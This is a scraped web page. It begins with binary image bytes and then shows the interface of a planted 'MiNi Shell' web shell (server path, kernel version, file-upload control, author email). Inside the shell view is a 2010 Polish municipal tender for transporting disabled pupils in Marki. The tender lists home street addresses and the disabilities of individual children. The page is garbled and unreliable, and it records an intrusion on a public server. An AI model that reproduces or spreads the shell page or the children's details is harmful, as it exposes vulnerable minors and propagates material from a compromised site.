JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100719/215380-N-2010.html

<p class="kh_header"><b>Marki: ŚWIADCZENIE  USŁUG  TRANSPORTOWYCH  DLA  UCZNIÓW NIEPEŁNOSPRAWNYCH ZAMIESZKAŁYCH W  MARKACH W ROKU SZKOLNYM 2010/2011 
Z PODZIAŁEM NA 2 ZADANIA  POLEGAJĄCE NA ZAPEWNIENIU TRANSPORTU I OPIEKI W CZASIE PRZEWOZU NA DRODZE DOM-SZKOŁA-DOM</b><br>
<b>Numer ogłoszenia: 215380 - 2010; data zamieszczenia: 19.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi  Placówek Oświatowych w Markach , ul. Klonowa 7, 05-270 Marki, woj. mazowieckie, tel. 022 771 37 34, faks 022 771 35 86.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.marki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE  USŁUG  TRANSPORTOWYCH  DLA  UCZNIÓW NIEPEŁNOSPRAWNYCH ZAMIESZKAŁYCH W  MARKACH W ROKU SZKOLNYM 2010/2011 
Z PODZIAŁEM NA 2 ZADANIA  POLEGAJĄCE NA ZAPEWNIENIU TRANSPORTU I OPIEKI W CZASIE PRZEWOZU NA DRODZE DOM-SZKOŁA-DOM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Świadczenie usług transportowych dla uczniów niepełnosprawnych zamieszkałych w Markach w roku szkolnym 2010/2011 z podziałem na 2 zadania  polegające na zapewnieniu transportu   i  opieki w czasie przewozu na drodze dom-szkoła-dom  następującymi trasami:
        Zadanie nr 1 
a)Marki ul. Legionowa 42 - Warszawskie Koło Polskiego Stowarzyszenia na rzecz Osób z Upośledzeniem Umysłowym w Warszawie ul. Grochowska 259 a  
(1 uczeń chodzący);
b)Marki ul. Mała 25 - Zespół Szkół Nr 5 w Warszawie ul. Szczawnicka 1 (1 uczeń chodzący);
c)Marki ul. Dąbrowskiego 2 - Zespół Szkół Specjalnych nr 105 w Warszawie ul. Długa 52 (1 uczeń chodzący);
d)Marki ul. Piaskowa 17b - Zespół Szkół Specjalnych nr 85 w Warszawie ul. Elektoralna 12/14 (1 uczeń na wózku inwalidzkim);
e)Marki ul. Okólna 25 - Wyższa Szkoła Finansów i Zarządzania w Warszawie ul. Pawia 55  (1 uczeń chodzący z balkonikiem);
f)Marki ul. 11-go listopada 8a, ul. Równa 1,  ul. Wołodyjowskiego 37a, 
ul. Grunwaldzka 11/7  - Szkoła Podstawowa Nr 5 w Warszawie  ul. Kordeckiego 54 (4 uczniów chodzących);
g)Marki ul. Lisa Kuli 98 - Liceum Ogólnokształcące w Warszawie ul. Burdzyńskiego (1 dziecko na wózku elektrycznym).
        Zadanie nr 2 
a)Marki  ul. Rzemieślnicza 7, ul. Grunwaldzka 7/3 - Liceum Ogólnokształcące w Zielonce ul. Inżynierska 1  (2 uczniów na wózkach);
b)Marki ul. Lisa Kuli 73b m 14, ul. Lisa Kuli 73b m 16, ul. Wiśniowa 7 - Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym w Wołominie, Filia przy ul. 1-go Maja 36 
(3 uczniów na wózkach);
c)Marki ul. Traugutta 8, ul. Lisa Kuli 30, ul. Pogodna 5, ul. Kmicica 6 - Szkoła Podstawowa w Wołominie ul. Miła 22 ( 4 uczniów chodzących);
d)Marki ul. Skłodowskiej 2 - Zespół Szkół nr 2 w Markach ul. Wczasowa 5 (uczeń chodzący).  
2.Uczniowie mają być dowożeni do szkoły zgodnie z ustalonym planem lekcji , w takim czasie aby możliwe było punktualne rozpoczęcie  przez nie zajęć szkolnych  i zabierani po ich  zakończeniu, bez zbędnego oczekiwania. Przed przystąpieniem do  realizacji usługi Wykonawca ustali optymalny rozkład jazdy dla poszczególnych  kursów mając na uwadze jak najkrótszy czas przebywania dziecka w podróży. Rozkład jazdy odnośnie wszystkich  kursów Wykonawca  przekaże do Zespołu Obsługi Placówek Oświatowych   osobie wyznaczonej do nadzoru wykonania usługi.
3.   Samochody wożące uczniów muszą być ubezpieczone oraz dostosowane technicznie do potrzeb  niepełnosprawnych uczniów z możliwością posadzenia ucznia w foteliku samochodowym dostosowanym do wieku i wzrostu dziecka lub przewiezienia go na wózku  inwalidzkim  zgodnie z obowiązującymi w tym zakresie przepisami. 
4.  Oprócz kierowcy w każdym samochodzie musi  jechać z uczniami przygotowany  do tej pracy opiekun zatrudniony przez Wykonawcę . W czasie transportu na trasie dom-szkoła-dom uczeń musi mieć zapewnioną opiekę ze strony opiekuna polegającą na pomocy w dojściu z domu do samochodu,  wejściu do pojazdu, opiece w czasie transportu w samochodzie, pomocy przy wychodzeniu z pojazdu, pomocy w dojściu  do szkoły  w odpowiednim stroju i pomocy w rozebraniu się w szkole. W drodze powrotnej do domu opiekun odbiera dziecko ze   szkoły i zapewnia odpowiednią jak wyżej opiekę do momentu  przekazania dziecka rodzicom lub opiekunom domowym.
5.  Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania  usług przewozu uczniów. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna spowodowana działalnością  Wykonawcy.
 6.  Wykonawca zamówienia musi realizować je zgodnie z przepisami prawa, a w szczególności w zgodzie z ustawą z dnia 6 września 2001 r. o transporcie  drogowym (tj. Dz. U. z 2007 r., Nr 125, poz. 874) oraz ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (t.j.   Dz.U. z 2005 r. Nr 108, poz. 908 z późn. zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od wykonawców wniesienia wadium w wysokości 1 000 zł na każde zadanie, na które Wykonawca składa ofertę.
2.Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu 
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:  90 8015 0004 0190 8596 2021 0002
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie licencji  na wykonywanie krajowego transportu drogowego osób. Ocena spełniania tego warunku udziału Wykonawców w postępowaniu zostanie dokonana w oparciu o formułę spełnia, nie spełnia na podstawie złożonego dokumentu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie  wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia 
działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie. Ocena spełniania tego warunku udziału Wykonawców w postępowaniu zostanie dokonana w oparciu o formułę spełnia, nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie niezbędnymi  do wykonania zamówienia pojazdami samochodowymi przystosowanymi do przewozu osób niepełnosprawnych. Ocena spełniania tego warunku udziału Wykonawców w postępowaniu zostanie dokonana w oparciu o formułę spełnia, nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie kierowcami, którzy będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych oraz dysponowanie osobami występującymi   w roli opiekunów posiadających przygotowanie do wykonywania podstawowych czynności pielęgnacyjno-opiekuńczych wobec dzieci w czasie przewozu oraz przeszkolenie w zakresie udzielania pierwszej pomocy. Ocena spełniania tego warunku udziału Wykonawców w postępowaniu zostanie dokonana w oparciu o formułę spełnia, nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni zanjdować się w sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie zamówienia. Ocena spełniania tego warunku udziału Wykonawców w postępowaniu zostanie dokonana w oparciu o formułę spełnia, nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.marki.pl  (zakładka Biuletyny Jedn. Samorządowych - poz. 14 - ZOPO w Markach)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Placówek Oświatowych w Markachul. Klonowa 7, pokój nr 3, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2010 godzina 11:00, miejsce: Zespół Obsługi Placówek Oświatowych w Markachul. Klonowa 7, pokój nr 3, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług transportowych dla uczniów niepełnosprawnych zamieszkałych w Markach
w roku szkolnym 2010/2011. Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług transportowych dla uczniów niepełnosprawnych zamieszkałych w Markach w roku szkolnym 2010/2011  polegające na zapewnieniu transportu   i  opieki w czasie przewozu na drodze dom-szkoła-dom  następującą trasą:
a)Marki ul. Legionowa 42 - Warszawskie Koło Polskiego Stowarzyszenia na rzecz Osób z Upośledzeniem Umysłowym w Warszawie ul. Grochowska 259 a  
(1 uczeń chodzący);
b)Marki ul. Mała 25 - Zespół Szkół Nr 5 w Warszawie ul. Szczawnicka 1 (1 uczeń chodzący);
c)Marki ul. Dąbrowskiego 2 - Zespół Szkół Specjalnych nr 105 w Warszawie ul. Długa 52 (1 uczeń chodzący);
d)Marki ul. Piaskowa 17b - Zespół Szkół Specjalnych nr 85 w Warszawie ul. Elektoralna 12/14 (1 uczeń na wózku inwalidzkim);
e)Marki ul. Okólna 25 - Wyższa Szkoła Finansów i Zarządzania w Warszawie ul. Pawia 55  (1 uczeń chodzący z balkonikiem);
f)Marki ul. 11-go listopada 8a, ul. Równa 1,  ul. Wołodyjowskiego 37a, 
ul. Grunwaldzka 11/7  - Szkoła Podstawowa Nr 5 w Warszawie  ul. Kordeckiego 54 (4 uczniów chodzących);
g)Marki ul. Lisa Kuli 98 - Liceum Ogólnokształcące w Warszawie ul. Burdzyńskiego (1 dziecko na wózku elektrycznym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie  usług  transportowych  dla  uczniów niepełnosprawnych zamieszkałych w   Markach  w roku szkolnym 2010/2011. Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług transportowych dla uczniów niepełnosprawnych zamieszkałych w Markach w roku szkolnym 2010/2011   polegające na zapewnieniu transportu i opieki w czasie przewozu na drodze dom-szkoła-dom  następującymi trasami:
a)Marki  ul. Rzemieślnicza 7, ul. Grunwaldzka 7/3 - Liceum Ogólnokształcące w Zielonce ul. Inżynierska 1  (2 uczniów na wózkach);
b)Marki ul. Lisa Kuli 73b m 14, ul. Lisa Kuli 73b m 16, ul. Wiśniowa 7 - Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym w Wołominie, Filia przy ul. 1-go Maja 36 
(3 uczniów na wózkach);
c)Marki ul. Traugutta 8, ul. Lisa Kuli 30, ul. Pogodna 5, ul. Kmicica 6 - Szkoła Podstawowa w Wołominie ul. Miła 22 ( 4 uczniów chodzących);
d)Marki ul. Skłodowskiej 2 - Zespół Szkół nr 2 w Markach ul. Wczasowa 5 (uczeń chodzący)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com